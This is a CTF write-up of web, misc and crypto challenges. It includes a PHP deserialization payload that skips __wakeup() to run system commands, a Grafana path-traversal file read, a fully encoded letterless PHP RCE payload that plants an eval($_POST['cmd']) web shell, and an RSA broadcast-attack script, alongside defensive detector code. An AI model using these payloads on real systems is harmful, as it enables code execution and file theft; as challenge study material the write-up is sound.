web
1.baby开胃菜 (baby appetizer)
Challenge address
Looking at the page source, we find
Then searching for "flag" turns up nothing useful
Scrolling further down, we find
Found the redirect
or
Try logging in with admin / admin
Obviously that fails
Then look at the page source again
Try the candidates one by one with Burp Suite
Send it over and the flag comes back
2.babyunser
Challenge address
Obviously a PHP deserialization challenge.
run() is only called when fast is true,
but preg_match() filters out fast, so we have to bypass __wakeup() during deserialization
by adding 1 to the declared property count, which skips __wakeup()
i.e. O:4:"hack":1:{s:4:"fast";b:1;}
is changed to O:4:"hack":2:{s:4:"fast";b:1;}
<?php
highlight_file(__FILE__);
class cwm
{
    public $a="cat";
    public $b="";
    public $booll;
}
class hack
{
    public $fast=true;
}
$a=new cwm();
$a->booll=new hack();
$a=serialize($a);
echo $a;
// serialize() output (taken with $a and $b set to "system" and "ls"):
// O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":1:{s:4:"fast";b:1;}}
// the same string with hack's property count bumped from 1 to 2 so that __wakeup() is skipped:
// O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":2:{s:4:"fast";b:1;}}
// final payload
//?NEUQCSA=O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:9:"cat /flag";s:5:"booll";O:4:"hack":2:{s:4:"fast";b:1;}}
?>
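The property-count trick above only works on PHP builds affected by CVE-2016-7124, and it leaves a tell-tale mark in the serialized string itself. The following is an added example (not part of the write-up): a small parser for PHP's serialize() format that flags any object whose declared property count does not match the members actually present, the kind of check an input filter can apply before unserialize() runs. The sample strings are the write-up's own, with names and outputs as on the page.

```python
def _parse(s, i):
    """Parse one value starting at s[i]; return (value, next_index, findings)."""
    findings = []
    t = s[i]
    if t == "N":                                   # N;
        return None, i + 2, findings
    if t in "bi":                                  # b:1;  i:42;
        j = s.index(";", i)
        return int(s[i + 2:j]), j + 1, findings
    if t == "s":                                   # s:4:"fast";
        j = s.index(":", i + 2)
        n = int(s[i + 2:j])
        start = j + 2                              # skip :"
        return s[start:start + n], start + n + 2, findings
    if t == "O":                                   # O:4:"hack":2:{...}
        j = s.index(":", i + 2)
        n = int(s[i + 2:j])
        name = s[j + 2:j + 2 + n]
        k = j + 2 + n + 2                          # position just after ":
        j2 = s.index(":", k)
        declared = int(s[k:j2])
        pos = j2 + 2                               # skip :{
        members = {}
        while s[pos] != "}":
            key, pos, f = _parse(s, pos)
            findings += f
            val, pos, f = _parse(s, pos)
            findings += f
            members[key] = val
        if declared != len(members):               # the __wakeup() bypass signature
            findings.append(f"{name}: declares {declared} properties but carries {len(members)}")
        return members, pos + 1, findings
    raise ValueError(f"unsupported or malformed token {t!r} at offset {i}")

def check_serialized(s):
    """Return every property-count mismatch found anywhere in the serialized string s."""
    _, end, findings = _parse(s, 0)
    if end != len(s):
        findings.append(f"trailing data after offset {end}")
    return findings

# Inputs taken from the write-up: the honest serialization and the tampered one.
CLEAN = 'O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":1:{s:4:"fast";b:1;}}'
TAMPERED = 'O:3:"cwm":3:{s:1:"a";s:6:"system";s:1:"b";s:2:"ls";s:5:"booll";O:4:"hack":2:{s:4:"fast";b:1;}}'
```

Arrays (a:) and floats (d:) are not handled here; they raise ValueError, which a filter should treat as a rejection rather than a pass.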
3.babycve (post-contest reproduction)
Note that the flag is in the root directory, so we should read /<sensitive file name>
!!! Of course that is also where I went wrong..
I kept reading / and got permission denied, and that was that
First of all, CVE stands for Common Vulnerabilities and Exposures, so obviously go look it up!
Search for grafana cve
Finally worked it through with Burp Suite
One last word: read /target-file …
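The requests tried above all share one shape: a path that starts under a static-asset prefix such as /public/plugins/<name>/ and then climbs out with "..". As an added example (not part of the write-up), this Python function normalizes a request path the way a server would and flags exactly that pattern, so it can be run over an access log to spot traversal attempts; the sample paths are constructed, not real traffic.

```python
import posixpath
from urllib.parse import unquote

STATIC_PREFIX = "/public/plugins/"

SAMPLE_PATHS = [                                     # constructed sample request paths
    "/public/plugins/welcome/img/logo.png",
    "/public/plugins/welcome/../../../../../../../../etc/passwd",
    "/public/plugins/graph/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd",
    "/public/plugins/graph/..%252F..%252Fetc%252Fpasswd",
    "/api/dashboards/home",
]

def resolve(path):
    """Percent-decode (twice, to catch double encoding) and collapse '.' and '..' segments."""
    decoded = unquote(unquote(path))
    return decoded, posixpath.normpath(decoded)

def is_traversal(path, prefix=STATIC_PREFIX):
    """True when the path starts inside prefix but uses '..' or resolves outside it."""
    decoded, normalized = resolve(path)
    if not decoded.startswith(prefix):
        return False                                 # not a static-asset request at all
    escaped = not normalized.startswith(prefix)      # climbed out of the plugin directory
    return escaped or ".." in decoded.split("/")     # or used '..' at all, even if it stayed inside

def scan(paths):
    """Return (raw_path, resolved_target) for every suspicious request path."""
    return [(p, resolve(p)[1]) for p in paths if is_traversal(p)]
```

The resolved target is worth logging alongside the raw path: it tells the responder which file was actually being reached for.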
4.babyrce (post-contest reproduction)
The filtering in this RCE challenge is really brutal.
Here is a handy site to help with the regular expression:
Online regex tester (菜鸟工具)
Fine, I am the rookie!!
Build the payload using only $ . _ [] () ; and the digits 0-9
Hmm, so where did I go wrong?
I could not construct a letter, or rather, not quite.
Also, because + is treated as a space inside a URL, the final payload has to be URL-encoded once more,
so that my browser does not turn the + into a space when it parses my payload.
Wrong:
$__.=($_.[])[3];   // $_ is unset: null . [] stringifies to "Array", and index 3 is 'a'
var_dump($__); //a
Why does that happen?
var_dump($_);
//NULL
$_.=[];            // appending an array to a string converts it to "Array"
var_dump($_);
//string(5) "Array"
However, that version does not get past eval().
eval() evaluates a string as PHP code.
The string must be valid PHP code and must end with a semicolon.
If the code string contains no return statement, NULL is returned; if the code contains a parse error, eval() returns false.
So the correct way to obtain a letter is:
$_=[];
$_.=$_;            // array . array gives "ArrayArray"
var_dump($_);
//string(10) "ArrayArray"
Then the letters are used to build the payload.
A small trick here: first construct the string chr,
then use the chr() function to obtain any letter, e.g. chr(65) -> A
$_=[];
$_.=$_;            // "ArrayArray"
$_3=$_[1];         // 'r'
$_=$_[3];          // 'a'
$_++;
$_++;
$_1=$_;            // 'a' incremented twice -> 'c'
$_++;
$_++;
$_++;
$_++;
$_++;
$_2=$_;            // five more increments -> 'h'
var_dump($_1.$_2.$_3);
//string(3) "chr"
A great blog post on this: variable functions
Construct the payload:
?rce=assert[$_GET['a']];&a=eval( $_POST[%27cmd%27])
rce=%24_%3D%5B%5D%3B%24_.%3D%24_%3B%24_%3D%24_%5B0%5D%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24_1%3D%24___%3B%24_3%3D%24_1%2865%29%3B%24_3.%3D%24_1%2883%29%3B%24_3.%3D%24_1%2883%29%3B%24_3.%3D%24_1%2869%29%3B%24_3.%3D%24_1%2882%29%3B%24_3.%3D%24_1%2884%29%3B%24_2%3D%24_1%2895%29%3B%24_2.%3D%24_1%2871%29%3B%24_2.%3D%24_1%2869%29%3B%24_2.%3D%24_1%2884%29%3B%24_2%3D%24%24_2%3B%24_3%28%24_2%5B%24_1%2897%29%5D%29%3B&a=eval($_POST[%27cmd%27])
863 characters, not too bad
Then just connect with AntSword
misc
1.Signin
We are only given an image
Then
First check the image metadata: nothing
Nothing found in WinHex either
Changing the width and height did not help either
Then binwalk
No hidden files found either
Finally, the Stegsolve.jar tool (it does not run on JDK 1.8, anyway)
javaw -jar D:\CTF-Tools\Stegsolve.jar
Using its Data Extract feature
reveals LSB steganography
flag{w3l c0m3_t0_NEUQCSA! !}
After getting the flag, the spaces have to be removed before submitting, i.e.:
flag{w3lc0m3_t0_NEUQCSA!!}
2.iii_puzzle (post-contest reproduction)
We are given 256 images, so obviously a jigsaw
Tried
montage
gaps
could not get it to work
Looked for a jigsaw website
Jigsaw website
In the end it looks like this:
16*16
every 16 tiles are assembled into one row
and the rows are then merged
It can basically be pieced together..
Then searched for the
barcode type
PDF417
Found another site to decode it:
Online PDF417 reader
And last of all:
this turns out to be base85 encoded?
Crypto
1.easy_RSA
Low-exponent broadcast attack (the moduli n and ciphertexts c differ, while the plaintext m and exponent e are the same)
Found a script on Baidu and filled in the corresponding n and c values
from functools import reduce
from gmpy2 import iroot, invert
from libnum import n2s
n1 = 99189590166797232086720980208396149145032434547157551749365685838243060096448779091791572975301913921989329359184771608887116503472004506156142409801072181723546939535133722634489479994529784315168828449203195148297729506864324569621412338216695262998675758819785818629225029964223785112715167603547994360609
n2 = 135431840186992180271858139761915626767751108603094107204397031326971439333697039026880373357031205070745565422848119633065831765028879556819138470835686890708601443126670396329313419801430432743829592927357587241703853883024899325883439786965817326936380880482088194276553234984011362490804054479032421439909
n3 = 157898945136154988968481764581371877763476832720021570935316682152828796062857138215008992476683694791253067903453617872812801176924017309834290645076768458268371025127436335007531745742325085054016448480033371383592313602941393621000501168909222100250956154249497572570242803660984747191373558068515671388437
c1 = 99429177413644824405277985119276356400754229883867141795505472902168763587290505868496543306289784277680831358606148179562285136275760910799009361205609456311688238414966461067828944820896917477690397079186551299401497045986055013
c2 = 99429177413644824405277985119276356400754229883867141795505472902168763587290505868496543306289784277680831358606148179562285136275760910799009361205609456311688238414966461067828944820896917477690397079186551299401497045986055013
c3 = 99429177413644824405277985119276356400754229883867141795505472902168763587290505868496543306289784277680831358606148179562285136275760910799009361205609456311688238414966461067828944820896917477690397079186551299401497045986055013
e=3
def CRT(a, n):
    total = 0
    N = reduce(lambda x, y: x * y, n)        # product of the n_i: N = n1*n2*n3
    for n_i, a_i in zip(n, a):               # zip() pairs each ciphertext with its modulus
        N_i = N // n_i                       # M_i = M / n_i
        total += a_i * N_i * invert(N_i, n_i)   # sum = C1*M1*y1 + C2*M2*y2 + C3*M3*y3
    return total % N
n = [n1, n2, n3]
c = [c1, c2, c3]
x = CRT(c, n)                                # x = m**3 exactly, because m**3 < N
m = iroot(x, e)[0]                           # gmpy2.iroot returns (root, is_exact)
print(m)
print(n2s(m))                                # libnum: integer -> bytes
Then I noticed something was slightly off,
so I just printed up to m,
converted the decimal m to hexadecimal,
then converted that to a string,
and got the flag.
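For anyone who wants to see the whole attack run end to end without gmpy2 or libnum, here is an added example (not part of the write-up) using only the standard library. It uses constructed toy keys (moduli 101*113, 131*137, 149*167; every prime is 2 mod 3, so e=3 is a valid exponent) and also shows the standard defence: as soon as each recipient's plaintext differs, for instance through randomised padding, the CRT value stops being a perfect cube and recovery fails.

```python
def crt(residues, moduli):
    """Combine x = a_i (mod n_i) over pairwise-coprime moduli into x mod N."""
    N = 1
    for n in moduli:
        N *= n
    total = 0
    for a, n in zip(residues, moduli):
        N_i = N // n
        total += a * N_i * pow(N_i, -1, n)       # modular inverse (Python 3.8+)
    return total % N

def iroot(x, k):
    """Exact integer k-th root of x, or None if x is not a perfect k-th power."""
    lo, hi = 0, 1 << (x.bit_length() // k + 1)
    while lo < hi:                               # binary search: smallest r with r**k >= x
        mid = (lo + hi) // 2
        if mid ** k < x:
            lo = mid + 1
        else:
            hi = mid
    return lo if lo ** k == x else None

def hastad_recover(cts, mods, e=3):
    """Recover m from e ciphertexts of one m under e coprime moduli, given m**e < N."""
    return iroot(crt(cts, mods), e)

MODS = [101 * 113, 131 * 137, 149 * 167]         # constructed toy moduli, not real keys
E = 3

def demo_same_plaintext(m=4242):
    # The same m is sent to three recipients with e=3: m**3 < n1*n2*n3, so CRT
    # yields m**3 over the integers and an ordinary cube root gives m back.
    cts = [pow(m, E, n) for n in MODS]
    return hastad_recover(cts, MODS, E)          # -> 4242

def demo_padded_plaintext(m=2000):
    # Per-recipient padding makes the plaintexts m*4+1, m*4+2, m*4+3 distinct;
    # the CRT value is then no longer a cube, so the root search returns None.
    cts = [pow(m * 4 + i, E, n) for i, n in enumerate(MODS, start=1)]
    return hastad_recover(cts, MODS, E)          # -> None
```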